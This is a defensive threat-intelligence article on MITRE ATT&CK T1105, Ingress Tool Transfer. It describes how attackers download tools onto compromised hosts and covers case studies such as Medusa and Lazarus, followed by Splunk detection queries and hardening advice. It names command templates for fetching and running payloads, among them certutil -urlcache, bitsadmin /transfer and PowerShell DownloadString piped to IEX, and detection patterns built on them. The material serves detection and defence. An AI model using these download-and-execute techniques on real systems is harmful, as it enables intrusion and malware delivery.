T1105: Ingress Tool Transfer

T1105 is categorized under the Command and Control tactic in MITRE ATT&CK. It describes the transfer of tools and files from an external adversary-controlled system into a compromised environment, either through an established C2 channel or through alternate protocols like HTTP, FTP, or cloud storage services. This is distinct from Lateral Tool Transfer (T1570), which describes moving tools between systems within an already compromised network.

The technique's prevalence is driven by a practical reality of offensive operations: initial access payloads are intentionally small and lightweight. A phishing attachment that drops a 50-line PowerShell stager, a web shell that provides basic command execution, or an exploited vulnerability that yields a reverse shell — none of these carry the full toolkit an attacker needs. The real tools — Cobalt Strike Beacon, Mimikatz, BloodHound, PsExec, ransomware encryptors, custom backdoors — are downloaded after the attacker confirms they have stable access to a live target.

What makes T1105 particularly challenging to defend against is that the tools used for malicious file transfers are the same tools used for legitimate administration. certutil.exe is a certificate management utility. BITSAdmin.exe manages Windows Update downloads. PowerShell is the backbone of Windows automation. curl and wget are standard Linux administration tools. Blocking them outright would cripple IT operations. This is the essence of living-off-the-land (LOTL): the attacker's toolkit is already installed on every system in the environment.

How Ingress Tool Transfer Works

The technique follows a consistent operational pattern across all threat actors, though the specific tools and protocols vary:

Phase 1 — Staging Infrastructure. Before the intrusion begins, the attacker prepares infrastructure to host the tools they will need. This could be a dedicated C2 server, a compromised legitimate website, a cloud storage bucket (S3, Azure Blob, Google Cloud Storage), a code repository (GitHub, GitLab, Bitbucket), a file-sharing platform (Dropbox, OneDrive, Google Drive, Sendspace), or a CDN endpoint. Sophisticated actors use legitimate services because they are trusted by corporate firewalls, proxies, and reputation-based security tools.

Phase 2 — Initial Download. Once the attacker has a foothold on the target system, they execute a command that downloads the next-stage payload from their staging infrastructure. On Windows, this typically uses certutil -urlcache -split -f, PowerShell Invoke-WebRequest, BITSAdmin /transfer, or curl.exe. On Linux and macOS, curl, wget, scp, and tftp serve the same purpose. The downloaded file may be a compiled executable, a DLL, a script (PowerShell, Python, Bash), or an encoded payload that requires decoding before execution.

Phase 3 — Integrity Verification. Advanced threat actors verify that the downloaded payload arrived intact. COSMICENERGY, an OT-targeting malware attributed to Russian interests, was observed using certutil -hashfile to check the SHA-256 hash of downloaded tools before executing them — the same verification step a legitimate administrator would perform.

Phase 4 — Execution and Expansion. The downloaded tools are executed, establishing more capable C2 channels, harvesting credentials, mapping the network, and preparing for the attacker's primary objective — whether that is data exfiltration, ransomware deployment, or persistent espionage access. This phase often triggers additional rounds of T1105 as the attacker downloads specialized tools for each stage of the operation.

Transfer Methods and LOLBins

The LOLBAS (Living Off the Land Binaries and Scripts) project documents over 200 Windows binaries that can be abused for file download and execution. PowerShell dominates, appearing in 71% of LOTL attacks according to recent telemetry. The following are the transfer methods observed with the highest frequency in the wild:

certutil.exe

Originally designed for managing certificates and Certificate Authority configuration, certutil has become one of the most abused LOLBins for file download. The command certutil -urlcache -split -f [URL] [output] downloads a file from a remote URL and saves it locally. Adversaries favor it because it is present on every Windows system, signed by Microsoft, and whitelisted by default in application control policies. The CISA advisory on Medusa ransomware (AA25-071A) specifically documented Medusa actors using certutil to download both CSS and MSI payloads as part of their ransomware deployment chain. Beyond downloading, certutil can also decode Base64-encoded payloads using certutil -decode, making it a two-stage tool — download an encoded payload, then decode it to produce the executable.

PowerShell

PowerShell provides multiple methods for downloading files: Invoke-WebRequest, (New-Object Net.WebClient).DownloadString(), (New-Object Net.WebClient).DownloadFile(), and Start-BitsTransfer. The DownloadString() method is particularly dangerous because it downloads content directly into memory and can be piped to Invoke-Expression (IEX) for execution without ever writing to disk — a fileless execution technique that bypasses file-based scanning. Medusa ransomware actors have been observed using increasingly complex PowerShell evasion techniques, including Base64-encoded commands (-EncodedCommand) with specific execution settings, and routinely delete PowerShell command-line history (T1070.003) to cover their tracks.

BITSAdmin

The Background Intelligent Transfer Service (BITS) is a Windows component designed for asynchronous, prioritized file transfers — primarily used for Windows Update. BITSAdmin.exe is its command-line management tool. Adversaries abuse it with bitsadmin /transfer [jobname] /priority HIGH [URL] [output] to download payloads. BITS transfers run in the background, survive system reboots, and automatically resume after network interruptions — capabilities designed for reliability that also make them resilient C2 delivery channels. QBot, Egregor, Astaroth, and Ramnit malware families have all been documented using BITSAdmin for payload retrieval.

curl and wget (Linux/macOS/Windows)

On Linux and macOS systems, curl and wget are the primary tools for HTTP-based file transfer. Since Windows 10 version 1803, curl.exe ships natively with the operating system, expanding its use in Windows-targeting campaigns. These tools support HTTPS (encrypted transfers), authentication, proxy configuration, and custom headers — providing adversaries with the same flexibility they provide administrators. ESXi-targeting campaigns, including recent ransomware operations against VMware environments, use curl and wget to download encryptors directly onto hypervisor hosts.

Cloud Sync and File-Sharing Abuse

A growing vector for ingress tool transfer is the abuse of cloud storage synchronization. If an attacker compromises a user's Dropbox, OneDrive, or Google Drive credentials, they can upload malicious files through the web portal. If the victim has the desktop sync client installed, those files automatically download to the local machine through the sync agent — a legitimate, encrypted, HTTPS-based transfer that security tools have no reason to flag. GitHub, GitLab, Bitbucket, Sendspace, and Pastebin are also commonly used to host payloads because their domains are trusted by web filters and corporate proxies. APT41's use of free web hosting tools (Cloudflare Workers, InfinityFree, TryCloudflare) for distributing malware payloads since at least August 2024 demonstrates how threat actors continuously seek new trusted platforms for tool delivery.

Windows search-ms Protocol Handler

A newer ingress vector documented by Trellix involves abusing the Windows search-ms protocol handler. Phishing lures trick users into clicking links that invoke search-ms:// URIs, which trigger Windows Explorer to display search results from a remote WebDAV or SMB share. The results appear to be local files, but they are served from the attacker's infrastructure. When the user opens one of these files, the malicious payload is transferred and executed. This technique combines social engineering (T1204 User Execution) with ingress tool transfer in a way that requires no LOLBin abuse and produces minimal forensic artifacts.

Real-World Case Studies

Medusa Ransomware — LOLBin-Driven Tool Delivery at Scale

Medusa ransomware, operating as a ransomware-as-a-service platform since June 2021, has impacted over 500 organizations across critical infrastructure sectors as of January 2026. A joint CISA/FBI/MS-ISAC advisory (AA25-071A, March 2025) documented Medusa's heavy reliance on T1105 through native Windows utilities. Medusa actors use certutil.exe with the -urlcache parameter to download CSS and MSI payloads, PowerShell with encoded commands and escalating evasion techniques for subsequent stage delivery, and Windows Management Instrumentation (WMI) for system enumeration alongside tool transfer operations. The advisory documented the actors systematically deleting PowerShell history after each session. The Lazarus Group subunit Stonefly has been linked to Medusa deployment since late 2025, adding a nation-state espionage dimension to what was previously a purely criminal operation — with custom tools including the Comebacker backdoor, BlindingCan RAT, ChromeStealer, and Mimikatz all transferred using T1105 methods.

Lazarus Group — Supply Chain Meets Ingress Transfer via npm

In April 2025, Lazarus Group expanded its Contagious Interview campaign by publishing 11 new malicious packages on the npm registry. These packages contained malware loaders that, once installed in a developer's environment, downloaded additional payloads from Bitbucket repositories. The campaign targeted developers through fake job interview scenarios where candidates were asked to install npm packages as part of a coding test. Once the package executed, it performed ingress tool transfer by downloading second-stage payloads — including credential stealers and full RATs — from attacker-controlled Bitbucket repositories that appeared to be legitimate development resources. This campaign represents a convergence of supply chain compromise (T1195) and ingress tool transfer, with the npm ecosystem serving as both the initial access vector and the delivery mechanism.

INC Ransomware — From LOLBin to Full Encryption

A forensic investigation published in 2024 documented an INC Ransomware intrusion that demonstrated the full LOLBin-to-encryption pipeline. After gaining initial access, the attackers used certutil.exe and BITSAdmin.exe to download their toolset — including network scanning utilities, credential harvesting tools, and the ransomware binary itself. The investigation showed the complete progression: LOLBin-based tool transfer, followed by reconnaissance, credential theft, lateral movement, data staging, and finally ransomware deployment. Each stage involved additional rounds of T1105 as specialized tools were downloaded for specific purposes.

Gamaredon — LNK-Based Tool Transfer Chains

Gamaredon, the Russian-linked threat group that has sustained offensive operations against Ukraine since the 2022 invasion, uses LNK files as the initial vector for ingress tool transfer. In campaigns documented by Cisco Talos in March 2025, phishing emails deliver LNK files that execute PowerShell commands to download the Remcos backdoor from attacker infrastructure. The download chain uses multiple stages: the LNK executes PowerShell, PowerShell downloads an intermediate loader, and the loader fetches the final Remcos payload. Each stage uses standard HTTP/S transfers through Invoke-WebRequest, making each individual transfer look like normal web traffic.

COSMICENERGY — Tool Transfer with Hash Verification in OT Environments

COSMICENERGY, an OT-targeting malware potentially linked to Russian emergency response exercises, demonstrated an unusual level of operational discipline around ingress tool transfer. After downloading tools onto compromised systems in operational technology environments, the malware verified payload integrity by computing SHA-256 hashes using certutil -hashfile — the same verification process a systems engineer would use when deploying legitimate software. This highlights that T1105 in critical infrastructure environments can follow the same patterns as legitimate change management processes, making detection based on tool behavior alone insufficient.

Detection Strategies

Detecting ingress tool transfer requires correlating process execution, command-line arguments, network connections, and file system activity. The challenge is that each individual indicator — a certutil execution, an outbound HTTPS connection, a new file appearing in a temp directory — is entirely normal in isolation. Detection must rely on the combination and context of these events.

Key Event IDs and Telemetry Sources

Source	Event	Detection Value
Sysmon 1	Process Creation	Captures full command lines for LOLBins. Look for certutil with -urlcache and -split, bitsadmin with /transfer or /download, PowerShell with DownloadString, DownloadFile, or Invoke-WebRequest.
Sysmon 3	Network Connection	Maps which process made which outbound connection. Flag system utilities (certutil, bitsadmin, mshta) making connections to external IP addresses or non-corporate domains.
Sysmon 11	File Creation	Identifies new files written to disk, including their path. Executable files or scripts appearing in %TEMP%, %APPDATA%, C:\ProgramData, or user profile directories after LOLBin execution are high-fidelity indicators.
Sysmon 15	FileCreateStreamHash	Captures alternate data streams (ADS) and Zone.Identifier marks that indicate files downloaded from the internet. Useful for identifying downloaded payloads even after they are renamed.
Win 4688	Process Creation (Security Log)	With command-line auditing enabled, provides the same LOLBin visibility as Sysmon 1. Enable via Group Policy: "Include command line in process creation events."
Proxy / Firewall Logs	HTTP/S Requests	URL categorization, file download events, and user-agent strings from LOLBins. certutil and BITSAdmin use distinctive user-agent strings that can be flagged.

SIEM Detection Queries

certutil Download Detection (Splunk) — identifies certutil.exe execution with command-line parameters associated with file download:

| certutil.exe abused for file download
index=sysmon EventCode=1
    process_name="certutil.exe"
| where match(CommandLine, "(?i)(urlcache|split|decode|encode|verifyctl)")
| where match(CommandLine, "(?i)(http|ftp|\\\\)")
| stats count earliest(_time) as first_seen latest(_time) as last_seen
        values(CommandLine) as commands by src_ip user
        parent_process_name
| sort -count

BITSAdmin and PowerShell Download Detection (Splunk) — identifies download activity through the two other most commonly abused Windows tools:

| BITSAdmin and PowerShell download detection
index=sysmon EventCode=1
    (process_name="bitsadmin.exe"
        AND (CommandLine="*download*" OR CommandLine="*transfer*"))
    OR
    (process_name="powershell.exe"
        AND (CommandLine="*DownloadString*"
             OR CommandLine="*DownloadFile*"
             OR CommandLine="*Invoke-WebRequest*"
             OR CommandLine="*Start-BitsTransfer*"
             OR CommandLine="*IEX*"))
| stats count values(CommandLine) as commands by src_ip user
        process_name parent_process_name
| sort -count

Executable File Creation in Suspicious Directories (Splunk) — identifies executable or script files written to common staging locations, correlated with LOLBin process activity:

| Files written to temp/staging directories after LOLBin execution
index=sysmon EventCode=11
    (TargetFilename="*.exe" OR TargetFilename="*.dll"
     OR TargetFilename="*.ps1" OR TargetFilename="*.bat"
     OR TargetFilename="*.msi" OR TargetFilename="*.hta")
    (TargetFilename="*\\Temp\\*"
     OR TargetFilename="*\\AppData\\*"
     OR TargetFilename="*\\ProgramData\\*"
     OR TargetFilename="*\\Downloads\\*")
| join type=inner src_ip
    [search index=sysmon EventCode=1
     (process_name="certutil.exe"
      OR process_name="bitsadmin.exe"
      OR process_name="powershell.exe"
      OR process_name="curl.exe")
    | stats latest(_time) as exec_time by src_ip process_name]
| where _time - exec_time < 300
| table _time src_ip user process_name TargetFilename

Known Threat Actors

Threat Actor	Attribution	Ingress Tool Transfer Usage
Lazarus Group	North Korea	Malicious npm packages with Bitbucket-hosted payloads, Comebacker backdoor delivery in Medusa ransomware operations, LOLBin abuse documented in "LolZarus" campaign.
APT41 (Brass Typhoon)	China	Free web hosting tools (Cloudflare Workers, InfinityFree) for VOLDEMORT, DUSTTRAP, and TOUGHPROGRESS payload distribution since August 2024.
Volt Typhoon	China	Living-off-the-land file transfers using PowerShell and native Windows utilities. Minimal external tool introduction to maintain stealth in critical infrastructure.
Gamaredon	Russia	LNK-to-PowerShell-to-Remcos multi-stage download chains targeting Ukrainian organizations. Sustained high-volume operations since 2022.
Medusa RaaS	Financially motivated	certutil and PowerShell for payload staging, RMM tool abuse (SimpleHelp, GoAnywhere MFT) for persistence. 500+ victims as of January 2026.
INDRIK SPIDER	Russia	Evolution from Dridex wire fraud through BitPaymer, WastedLocker, and LOCKBIT deployment — all stages using LOLBin-based tool transfer.
APT29 (Midnight Blizzard)	Russia (SVR)	FoggyWeb and SUNBURST backdoor delivery through compromised supply chains. Post-exploitation tools transferred via C2 channels over HTTPS.
BlackTech	China	BendyBear shellcode delivery and custom backdoor installation via router firmware modification and LOLBin downloads.
Turla	Russia (FSB)	LightNeuron mail-based tool delivery, PowerShell-based secondary payload staging in Operation Ghost campaigns.
OilRig (APT34)	Iran	Steganography-based payload encoding combined with HTTP/S download for covert tool transfer to telecom targets.

T1105 appears in the operational playbooks of virtually every ransomware group (Medusa, LockBit, Black Basta, Conti, MAZE, INC Ransom, Egregor), commodity malware family (QBot, Emotet, RedLine, Agent Tesla, Remcos), and red team framework (Cobalt Strike, Sliver, Havoc, Brute Ratel, Metasploit). It is the connective tissue between initial access and every subsequent phase of an intrusion.

Defensive Recommendations

1. Enable comprehensive command-line logging: Deploy Sysmon with a configuration capturing Event IDs 1 (process creation), 3 (network connection), 11 (file creation), and 15 (file stream creation). Enable Windows Security Event 4688 with command-line auditing. Without command-line visibility, every LOLBin detection analytic is blind. This is the single highest-priority control for T1105 detection.
2. Block outbound network connections for LOLBins: Use the Windows host firewall (or equivalent endpoint firewall) to block outbound network connections for commonly abused binaries: certutil.exe, mshta.exe, regsvr32.exe, rundll32.exe, and certreq.exe. These binaries rarely need internet access in production environments. This is a high-impact, low-effort control that blocks several T1105 vectors without impacting normal operations.
3. Implement application control policies: Use Windows Defender Application Control (WDAC) or AppLocker to restrict which executables can run in user-writable directories (%TEMP%, %APPDATA%, Downloads). This does not prevent the download itself but blocks the execution of downloaded payloads — breaking the kill chain between transfer and impact.
4. Deploy web proxy with SSL inspection and categorization: Route all outbound HTTP/S traffic through an inspecting proxy. Block downloads of executable file types (.exe, .dll, .msi, .hta, .ps1, .bat, .cmd, .vbs) from uncategorized or newly registered domains. Monitor for downloads from cloud storage, code repositories, and file-sharing platforms that do not match expected business use.
5. Restrict PowerShell execution: Enable PowerShell Constrained Language Mode on all endpoints. Deploy PowerShell Script Block Logging and Module Logging. Consider disabling PowerShell v2 (which lacks logging capabilities) via Disable-WindowsOptionalFeature -FeatureName MicrosoftWindowsPowerShellV2. Implement JEA (Just Enough Administration) for administrative tasks that require PowerShell.
6. Monitor BITS activity: BITS jobs persist across reboots and can be configured to run on a schedule. Monitor for unexpected BITS job creation using Get-BitsTransfer -AllUsers or by auditing the BITS event log (Microsoft-Windows-Bits-Client/Operational). Alert on BITS jobs downloading from external URLs, especially when created by non-standard parent processes.
7. Enforce DNS filtering and egress restrictions: Block access to known malicious domains, newly registered domains (less than 30 days old), and dynamic DNS providers. Restrict outbound DNS to designated recursive resolvers only. For critical servers and OT systems, implement strict egress allowlists that limit outbound connections to only the specific destinations required for operations.
8. Validate defenses through simulation: Use Atomic Red Team's T1105 test suite, which includes 20+ atomic tests covering certutil, BITSAdmin, PowerShell, curl, scp, and other transfer methods. Run each test and verify that your detection analytics generate the expected alerts. Pay particular attention to fileless download methods (IEX(New-Object Net.WebClient).DownloadString()) which bypass file-based detection entirely.

MITRE ATT&CK Mapping

Field	Value
Technique ID	T1105
Technique Name	Ingress Tool Transfer
Tactics	Command and Control
Platforms	Windows, Linux, macOS, Network Devices, ESXi
Sub-Techniques	None (T1105 has no sub-techniques)
Data Sources	File (Creation), Network Traffic (Content, Flow), Process (Creation)
Related Techniques	T1570 Lateral Tool Transfer, T1059 Command and Scripting Interpreter, T1218 System Binary Proxy Execution
MITRE Reference	attack.mitre.org/techniques/T1105

Sources and References

• MITRE ATT&CK — T1105 Ingress Tool Transfer: attack.mitre.org
• CISA/FBI/MS-ISAC — #StopRansomware: Medusa Ransomware (AA25-071A, March 2025): cisa.gov
• Red Canary — 2025 Threat Detection Report, Ingress Tool Transfer: redcanary.com
• Atomic Red Team — T1105 Atomic Tests: atomicredteam.io
• Cisco Talos — Gamaredon LNK Campaign (March 2025): blog.talosintelligence.com
• LOLBAS Project — Living Off the Land Binaries, Scripts and Libraries: lolbas-project.github.io
• Symantec — Lazarus Group Medusa Ransomware Operations (2026): broadcom.com